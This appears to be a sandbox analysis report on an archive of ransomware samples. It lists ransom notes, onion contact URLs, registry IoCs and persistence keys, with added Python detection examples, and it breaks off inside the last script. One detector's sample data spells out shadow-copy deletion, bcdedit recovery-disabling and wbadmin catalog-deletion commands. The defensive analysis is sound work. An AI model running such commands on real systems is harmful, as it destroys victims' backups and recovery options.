Analysis

max time kernel: 379s
max time network: 383s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-10-2024 21:38
Static task: static1
Behavioral task: behavioral1
Sample: RNSM00403.7z
Resource: win10v2004-20241007-en
General

Target: RNSM00403.7z
Size: 60.6MB
MD5: f61f92161d115bc21c47483258803ca7
SHA1: 56c8ce8f2a6104b40f1a88d1b42f083dad7a9de9
SHA256: 8aeb260c2e350147f992e73b8f6fedba94fd04d12e8a2ba3e4ec8500baa13830
SHA512: 25e5061c1ed6c457c7f46bad5f19b27369dc4409f40c02bc2f63e39d102aa54a1ed7532018ef8a8c3469e574daf1c6ba8160c24ea5efbeaa8f5b97dfc63fe173
SSDEEP: 1572864:xLROHSmpHJN4vOB7FHXhWZHEvM33yiUY92Y3FCC7m9tx3Yrr:NROySTWw+yvwita2E7+tx3YP
Malware Config

Extracted
  Family: mespinoza
  Ransom note: Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.

Extracted
  Path: F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README

Extracted
  Path: C:\Program Files (x86)\readme.txt
  Family: conti
  URLs:
    http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion
    https://contirecovery.info

Extracted
  Path: C:\Recovery\README.d96d1f6d.TXT
  Family: darkside
  URLs:
    http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
    http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Extracted
  Path: C:\Program Files\Crashpad\attachments\Restore-My-Files.txt
  Family: lockbit
  URLs:
    http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE
    http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE
Signatures

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.

Conti family

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

Darkside family

DemonWare
Ransomware first seen in mid-2020.

Demonware family

GandCrab payload (2 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/3448-139-0x00000000006F0000-0x0000000000707000-memory.dmp  family_gandcrab
  behavioral1/memory/3448-138-0x0000000000400000-0x0000000000460000-memory.dmp  family_gandcrab
  (PID 3448 is HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe per the "Executes dropped EXE" list below.)

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.

Gandcrab family

Glupteba family

Lockbit
Ransomware family with multiple variants released since late 2019.

Lockbit family

Mespinoza Ransomware (2 TTPs)
Also known as Pysa. Ransomware-as-a-service which first appeared in 2020.

Mespinoza family

Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
  description  ioc                                          Process
  Key opened   \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
  Key opened   \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe

Modifies boot configuration data using bcdedit (1 TTP, 3 IoCs)
  pid   Process
  5540  bcdedit.exe
  3656  bcdedit.exe
  7752  bcdedit.exe
Renames multiple files with added filename extension (four hits: 1592, 4445, 5639 and 9854 files)
This suggests ransomware activity: files across the system are being encrypted and renamed.
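The "Renames multiple (N) files with added filename extension" signature above is a rate heuristic: it counts renames of the form file.ext -> file.ext.<new> per process and fires once the count is large. The following is an added example of that logic, not code from the sandbox or from any of the samples; the event format, the per-process counts, the extensions .locked and .enc, and the threshold and window values are all constructed (PIDs 2080 and 3088 appear in this report, but what they rename here is invented).

```python
"""Rename-burst heuristic of the kind behind "Renames multiple (N) files with
added filename extension". Added example for this report, not sandbox code;
the event format, counts, extensions and thresholds are constructed.
"""
import os
from collections import defaultdict, deque


def generate_events():
    """Constructed file-rename events as (t_seconds, pid, old_path, new_path).
    PIDs 2080 and 3088 appear in the report; what they rename here is invented."""
    events = []
    for i in range(40):   # pid 2080: 40 renames in 4 s, each appending ".locked"
        old = rf"C:\Users\Admin\Documents\report{i}.docx"
        events.append((10.0 + i * 0.1, 2080, old, old + ".locked"))
    for i in range(25):   # pid 3088: 25 renames appending ".enc", 2.4 s apart
        old = rf"F:\share\photo{i}.jpg"
        events.append((20.0 + i * 2.4, 3088, old, old + ".enc"))
    for i in range(5):    # pid 9001: a build tool swapping .tmp for .o (nothing appended)
        events.append((30.0 + i, 9001, rf"C:\build\obj{i}.tmp", rf"C:\build\obj{i}.o"))
    return sorted(events)


def added_extension(old_path, new_path):
    """Return the suffix appended to the file name (file.docx -> file.docx.locked),
    or None when the rename is not of that shape (file.tmp -> file.o)."""
    old_name = os.path.basename(old_path.replace("\\", "/"))
    new_name = os.path.basename(new_path.replace("\\", "/"))
    if len(new_name) > len(old_name) and new_name.startswith(old_name):
        suffix = new_name[len(old_name):]
        return suffix if suffix.startswith(".") else None
    return None


def detect_rename_bursts(events, threshold=20, window_s=30.0):
    """Per-process sliding window over extension-appending renames; one alert per
    process once the count inside the window reaches the threshold."""
    windows = defaultdict(deque)
    extensions = defaultdict(set)
    alerts = {}
    for t, pid, old, new in sorted(events):
        ext = added_extension(old, new)
        if ext is None:
            continue
        q = windows[pid]
        q.append(t)
        extensions[pid].add(ext)
        while q and t - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and pid not in alerts:
            alerts[pid] = {"at": t, "count_in_window": len(q),
                           "extensions": sorted(extensions[pid])}
    return alerts


if __name__ == "__main__":
    for pid, info in detect_rename_bursts(generate_events()).items():
        print(f"pid {pid}: {info['count_in_window']} renames by t={info['at']:.1f}s, "
              f"added {info['extensions']}")
```

The window matters as much as the threshold: with the defaults only the fast encryptor (pid 2080) alerts, while the slow one (pid 3088) never has 20 renames inside 30 seconds and is only caught when the window is widened. Recording the appended extension is worth the extra set per process, since a single new extension across thousands of renames is what separates an encryptor from a backup or indexing tool.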
  pid   Process
  7444  wbadmin.exe
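The "Deletes shadow copies", "Modifies boot configuration data using bcdedit" and wbadmin.exe entries above are the three halves of the recovery-inhibition chain (MITRE ATT&CK T1490) that most of these families run before encrypting. The report records only that bcdedit.exe (PIDs 5540, 3656, 7752) and wbadmin.exe (PID 7444) executed, not their arguments, so the detection below is an added example rather than sandbox or sample code: the command lines are constructed to show what such a rule keys on, and PIDs 6100 to 6103 are invented for the benign/malicious mix.

```python
"""Detect command lines that inhibit system recovery (MITRE ATT&CK T1490).

Added example for this report, not code from the sandbox or the samples.
The report records only that bcdedit.exe (PIDs 5540, 3656, 7752) and
wbadmin.exe (PID 7444) ran; the command lines here are constructed, and
PIDs 6100-6103 are invented.
"""
import re
from dataclasses import dataclass

# Constructed sample process-creation telemetry: (pid, image, command line).
SAMPLE_EVENTS = [
    (5540, "bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    (3656, "bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    (7752, "bcdedit.exe", "bcdedit /enum"),                              # benign: read-only
    (7444, "wbadmin.exe", "wbadmin delete catalog -quiet"),
    (6100, "vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
    (6101, "vssadmin.exe", "vssadmin list shadows"),                     # benign: read-only
    (6102, "wmic.exe", "wmic shadowcopy delete"),
    (6103, "powershell.exe",
     "powershell Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"),
]

# (technique label, image pattern, command-line pattern on the normalised line)
RULES = [
    ("T1490 shadow copies deleted (vssadmin)", r"vssadmin", r"\bdelete\s+shadows\b"),
    ("T1490 shadow copies deleted (wmic)", r"wmic", r"\bshadowcopy\s+delete\b"),
    ("T1490 shadow copies deleted (WMI via PowerShell)", r"powershell|pwsh",
     r"win32_shadowcopy.*\.delete\(\)"),
    ("T1490 boot recovery disabled (bcdedit)", r"bcdedit", r"\brecoveryenabled\s+(no|off|0)\b"),
    ("T1490 boot failures ignored (bcdedit)", r"bcdedit", r"\bbootstatuspolicy\s+ignoreallfailures\b"),
    ("T1490 backup catalog deleted (wbadmin)", r"wbadmin",
     r"\bdelete\s+(catalog|systemstatebackup|backup)\b"),
]


@dataclass(frozen=True)
class Hit:
    pid: int
    image: str
    technique: str


def normalize(cmdline: str) -> str:
    """Collapse whitespace and lowercase so spacing and case tricks do not dodge the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def classify(pid: int, image: str, cmdline: str) -> list:
    """Return one Hit per rule the event matches; a read-only invocation matches none."""
    norm = normalize(cmdline)
    return [Hit(pid, image, label)
            for label, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, norm)]


def scan(events) -> list:
    hits = []
    for pid, image, cmdline in events:
        hits.extend(classify(pid, image, cmdline))
    return hits


def recovery_inhibition_chain(events, min_distinct: int = 2) -> bool:
    """True when several different recovery-inhibition techniques appear in one
    event set; ransomware typically chains vssadmin/wmic, bcdedit and wbadmin."""
    return len({h.technique for h in scan(events)}) >= min_distinct


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"pid {h.pid:>5}  {h.image:<16} {h.technique}")
    print("chain detected:", recovery_inhibition_chain(SAMPLE_EVENTS))
```

bcdedit, wbadmin and vssadmin are legitimate administration tools, so alerting on the image alone is noisy; the signal is in the arguments (recoveryenabled No, bootstatuspolicy ignoreallfailures, delete catalog, delete shadows) and, stronger still, in two or more of them appearing from the same process tree within a short time, which is what recovery_inhibition_chain checks.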
Downloads MZ/PE file

Drops file in Drivers directory (1 IoC)
  description   ioc                                        Process
  File created  C:\Windows\SysWOW64\drivers\gmreadme.txt  CyberPunk2077.exe

Modifies Windows Firewall (2 TTPs, 2 IoCs)
  pid   Process
  2408  netsh.exe
  8584  netsh.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description        ioc                                                              Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe

Checks computer location settings (2 TTPs, 7 IoCs)
Looks up the country configured in the registry (the numeric GeoID stored under Geo\Nation), likely a geofence check.
  description        ioc
  Key value queried  \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation
  Process (one query each):
    HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
    HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
    wscript.exe
    Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
    CyberPunk2077.sfx.exe
Credentials from Password Stores: Windows Credential Manager (1 TTP)
Suspicious access to Credentials History.

Drops startup file (1 IoC)
  description   ioc                                                               Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\readme.txt  HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
  Word only loads templates and add-ins from its STARTUP folder, not .txt files, so this is most likely the ransom note being written into every directory during the file sweep rather than an Office persistence mechanism.

Executes dropped EXE (31 IoCs)
  pid   Process
  648   HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
  4728  HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
  1824  HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
  2116  HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
  2080  HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
  3128  HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
  1056  HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
  3448  HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
  2792  HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
  3088  HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
  1264  Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
  4996  Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
  4736  Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
  3404  Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
  4728  Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
  5520  Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
  5044  Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
  5908  Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
  5892  Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
  5444  backup.exe
  5472  CyberPunk2077.sfx.exe
  6072  Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe
  1324  CyberPunk2077.exe
  6876  Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
  5800  CyberPunk2077.exe
  6448  UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
  6948  497D8E.exe
  6128  Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
  2984  HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
  8636  csrss.exe
  7868  patch.exe
Identifies Wine through registry keys (2 TTPs, 2 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  description  ioc                                                                           Process
  Key opened   \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine  Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
  Key opened   \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine  Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
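The four registry signatures above (VirtualBox ACPI table, BIOS version strings, Geo\Nation, Wine key) are individually weak: installers read Geo\Nation for locale, inventory agents read BIOS strings. What a practitioner wants is the combination per process. The following is an added example, not code from the sandbox or any sample: it parses the IoC rows of those four tables exactly as they appear in this report, assigns each registry path to an evasion category, and scores each process by how many distinct categories it touched. The category names, patterns and score are this example's own assumptions.

```python
"""Classify sandbox-reported registry reads into anti-analysis categories.

Added example for this report; not code from the sandbox or from any sample.
ROWS are the IoC rows from the four registry signatures in the report. The
category names, the patterns and the per-process score are assumptions.
"""
import re
from collections import defaultdict

ROWS = [
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe",
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation CyberPunk2077.sfx.exe",
    r"Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe",
    r"Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe",
]

# "<operation> <registry path, may contain spaces> <process, no spaces>"
ROW_RE = re.compile(r"^(Key opened|Key value queried) (\\REGISTRY\\.+) (\S+)$")

CATEGORIES = [
    ("anti-VM: VirtualBox ACPI table (VBOX__)",
     re.compile(r"\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__$", re.I)),
    ("anti-sandbox: BIOS/VideoBIOS version strings",
     re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(SystemBiosVersion|VideoBiosVersion)$", re.I)),
    ("anti-sandbox: Wine compatibility layer key",
     re.compile(r"\\Software\\Wine$", re.I)),
    ("geofence: configured country (GeoID under Geo\\Nation)",
     re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I)),
]


def parse_row(row):
    """Split one IoC row into (operation, registry path, process)."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised IoC row: {row[:50]}")
    return m.group(1), m.group(2), m.group(3)


def categorize(path):
    """Evasion categories a registry path belongs to (empty for unrelated keys)."""
    return [label for label, rx in CATEGORIES if rx.search(path)]


def build_profile(rows):
    """Map each process to the sorted list of evasion categories it touched."""
    profile = defaultdict(set)
    for row in rows:
        _, path, process = parse_row(row)
        profile[process].update(categorize(path))
    return {proc: sorted(cats) for proc, cats in profile.items()}


def evasion_score(profile):
    """Distinct categories per process; several from one unsigned binary is the signal."""
    return {proc: len(cats) for proc, cats in prof_items(profile)}


def prof_items(profile):
    return profile.items()


def short_name(process):
    """Report names are '<detection>-<sha256>.exe'; drop the hash for display."""
    return re.sub(r"-[0-9a-f]{64}\.exe$", ".exe", process)


if __name__ == "__main__":
    profile = build_profile(ROWS)
    for proc, score in sorted(evasion_score(profile).items(), key=lambda kv: -kv[1]):
        print(f"{score}  {short_name(proc)}")
        for cat in profile[proc]:
            print(f"     - {cat}")
```

On this report the Crusis sample scores 3 (VirtualBox ACPI, BIOS strings and Wine), the Blocker.msqy sample 2, and the seven Geo\Nation readers 1 each. A score of 1 from a geofence read alone is not worth an alert; two or more categories from a binary that is not an installer or an inventory agent is.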
Loads dropped DLL (54 IoCs)
  pid   Process
  3128  HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe  (7 entries)
  3404  Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe  (15 entries)
  5800  CyberPunk2077.exe  (32 entries)
  (One entry per DLL load; the DLL paths themselves are not part of this listing.)

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 8 IoCs)
All eight rows are "Set value (str)"; the value data is shown with the report's own escaping (\\ for a backslash, \" for a quote).

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell
  Value:   "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe"
  Process: Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell
  Value:   "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe"
  Process: HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WispyDarkness
  Value:   "\"C:\\Windows\\rss\\csrss.exe\""
  Process: HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateHandler
  Value:   "wscript C:\\Updates\\h.vbs C:\\Updates\\Exec.bat"
  Process: reg.exe

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backup.exe
  Value:   "C:\\Users\\Admin\\AppData\\Roaming\\backup.exe"
  Process: HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe

  Key:     \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{FB6267AC-E377-3F35-E7F4-6404CFE16080}
  Value:   "\"C:\\ProgramData\\{67724F9C-CB47-A325-E7F4-6404CFE16080}\\CACD9F03.exe\""
  Process: svchost.exe

  Key:     \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Razor 1911 Uninstall 497D8E.exe
  Value:   "command.com /C del \"C:\\Users\\Admin\\AppData\\Local\\Temp\\497D8E.exe\""
  Process: 497D8E.exe

  Key:     \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01
  Value:   "\"C:\\Users\\Admin\\Desktop\\00403\\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe\""
  Process: HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
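The Run/RunOnce entries above show the three things worth checking in any autostart value: where the target lives (AppData, ProgramData, Desktop and Temp are all user-writable), whether a system-binary name such as PowerShell.exe or csrss.exe sits outside System32/SysWOW64, and whether the target is a script host or command interpreter handed a script path. The following is an added example, not sandbox or sample code: it parses the eight "Set value (str)" rows exactly as the report prints them (with the report's \\ and \" escaping), and raises those flags. The flag names, the path lists and the name sets are this example's own assumptions.

```python
r"""Triage autostart (Run/RunOnce) entries written during the detonation.

Added example for this report, not sandbox code. ROWS are the eight
"Set value (str)" rows from the "Adds Run key to start application" table,
kept with the report's own escaping (\\ for a backslash, \" for a quote).
The flag names, the path lists and the name sets are assumptions.
"""
import re
from dataclasses import dataclass

ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe" Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe" HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WispyDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateHandler = "wscript C:\\Updates\\h.vbs C:\\Updates\\Exec.bat" reg.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backup.exe = "C:\\Users\\Admin\\AppData\\Roaming\\backup.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{FB6267AC-E377-3F35-E7F4-6404CFE16080} = "\"C:\\ProgramData\\{67724F9C-CB47-A325-E7F4-6404CFE16080}\\CACD9F03.exe\"" svchost.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Razor 1911 Uninstall 497D8E.exe = "command.com /C del \"C:\\Users\\Admin\\AppData\\Local\\Temp\\497D8E.exe\"" 497D8E.exe',
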